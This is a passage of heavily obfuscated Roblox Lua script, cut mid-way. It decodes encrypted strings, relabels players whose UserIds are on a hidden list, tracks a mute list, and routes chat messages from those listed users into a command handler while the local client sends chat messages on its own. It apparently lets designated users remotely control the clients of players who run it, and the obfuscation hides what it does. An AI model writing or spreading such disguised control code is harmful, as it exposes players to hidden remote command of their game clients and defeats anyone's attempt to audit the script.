]=v7("\48\170\161","\115\113\198\205\206\86")};game:GetService(v7("\182\82\238\86\141\84\255\78\129\83\205\78\139\69\255\93\129","\58\228\55\158")).DefaultChatSystemChatEvents.SayMessageRequest:FireServer(unpack(v604));break;end end end break;end end end break;end end end break;end end break;end if (v353==(1303 -(384 + 917))) then v358=nil;v359=nil;v353=3;end if (v353==0) then local v419=0;while true do if (v419==(697 -(128 + 569))) then v354=1543 -(1407 + 136) ;v355=nil;v419=1888 -(687 + 1200) ;end if (v419==(1711 -(556 + 1154))) then v353=3 -2 ;break;end end end end end end muted={};mutingnew=false;v29.PlayerAdded:Connect(function(v305) local v306=table.find(v146,v305.UserId);if v306 then v305.CharacterAdded:Connect(function() if ((v305.Name~=v7("\184\140\218\43\50\169\45\173\147","\85\212\233\176\78\92\205")) and (v305.Name~=v7("\72\87\155\241\95\10\216\179\27\10","\130\42\56\232"))) then v305.Character:WaitForChild(v7("\194\160\41\226\78\48\227\177","\95\138\213\68\131\32")).DisplayName=v7("\17\7\150\109\83\24\21","\22\74\72\193\35")   .. v305.Character:FindFirstChild(v7("\4\108\233\89\34\118\237\92","\56\76\25\132")).DisplayName ;else v305.Character:WaitForChild(v7("\118\212\166\39\193\81\200\175","\175\62\161\203\70")).DisplayName=v7("\7\242\244\61\16\14\224","\85\92\189\163\115")   .. v305.Character:FindFirstChild(v7("\1\185\61\57\39\163\57\60","\88\73\204\80")).DisplayName ;end end);end if (muteingnew==true) then if  not table.find(muted,v305.Name) then local v395=0;while true do if (v395==0) then table.insert(muted,v305.Name);print(v7("\47\150\4\73\36\207\58\134\20\6","\186\78\227\112\38\73")   .. v305.Name );break;end end end end end);local v149=game.ReplicatedStorage.DefaultChatSystemChatEvents;v149.OnMessageDoneFiltering.OnClientEvent:Connect(function(v307) local v308=95 -(9 + 86) ;local v309;local v310;local v311;while true do if (v308==(422 -(275 + 146))) then v311=nil;while true do if (v309==1) then while true do if (v310==(0 + 0)) then plr=game.Players[""   .. v307.FromSpeaker   .. "" ];msg=v307.Message;v310=65 -(29 + 35) ;end if (v310==1) then v311=table.find(v146,plr.UserId);if v311 then v148(msg,plr.UserId);end break;end end break;end if (v309==(0 -0)) then v310=0;v311=nil;v309=2 -1 ;end end break;end if (v308==(0 -0)) then v309=0;v310=nil;v308=1 + 0 ;end end end);
